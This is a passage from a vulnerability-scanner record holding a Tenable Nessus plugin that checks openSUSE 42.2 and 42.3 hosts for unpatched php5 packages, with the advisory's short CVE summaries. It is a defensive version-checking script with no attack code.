"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-opcache", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-firebird-debuginfo", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-firebird", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-ldap"], "id": "OPENSUSE-2017-1010.NASL", "href": "https://www.tenable.com/plugins/nessus/102966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1010.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102966);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-7890\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2017-1010)\");\n script_summary(english:\"Check for the openSUSE-2017-1010 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX\n deserialization of booleanparameters could be used by\n attackers able to inject XML for deserialization tocrash\n the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() in Zend/zend_ini_parser.c (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data\n in gdImageCreateFromGifCtx function could lead to denial\n of service (bsc#1050241)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986386\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php5-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php5-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bcmath-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bcmath-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bz2-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-bz2-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-calendar-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-calendar-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ctype-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ctype-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-curl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-curl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dba-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dba-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-debugsource-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-devel-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dom-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-dom-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-enchant-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-enchant-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-exif-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-exif-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fastcgi-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fastcgi-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fileinfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fileinfo-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-firebird-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-firebird-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fpm-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-fpm-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ftp-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ftp-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gd-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gd-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gettext-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gettext-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gmp-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-gmp-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-iconv-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-iconv-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-imap-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-imap-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-intl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-intl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-json-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-json-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ldap-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ldap-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mbstring-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mbstring-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mcrypt-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mcrypt-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mssql-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mssql-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mysql-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mysql-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-odbc-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-odbc-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-opcache-5.5.14-77.9.1\") ) flag++;\nif ( 